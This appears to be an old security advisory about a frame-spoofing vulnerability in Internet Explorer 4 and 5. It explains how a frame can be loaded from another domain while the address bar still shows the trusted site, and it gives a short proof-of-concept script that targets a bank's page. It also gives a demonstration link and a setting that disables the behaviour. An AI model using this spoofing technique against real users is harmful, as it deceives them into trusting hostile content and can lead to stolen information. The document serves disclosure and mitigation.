COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE4, 5

PROBLEM

    Georgi  Guninski  found  following.   Internet  Explorer 5.0 under
    Windows 95 (guess  other versions are  affected) with its  default
    security settings allows frame  spoofing.  The problem  is setting
    the location of a frame  to an arbitrary URL without  updating the
    address bar.  This vulnerability allows misleading the user he  is
    browsing  a  trusted  site,  while  in  fact  he may be browsing a
    hostile site which might be stealing information.  The code is:

        <SCRIPT>
        b=window.open("http://www.citybank.com");
        function g()
        {
        b.frames[2].location="http://www.yahoo.com";
        }
        setTimeout("g()",6000);
        </SCRIPT>

    Demonstration is available at

        http://www.nat.bg/~joro/msfrspoof.html

    4.72.3110.8, 128 Bit SP1 on NT4 also appears to be vulnerable.

SOLUTION

    Set  "Navigate  sub-frames  across  different  domains"  option to
    Disable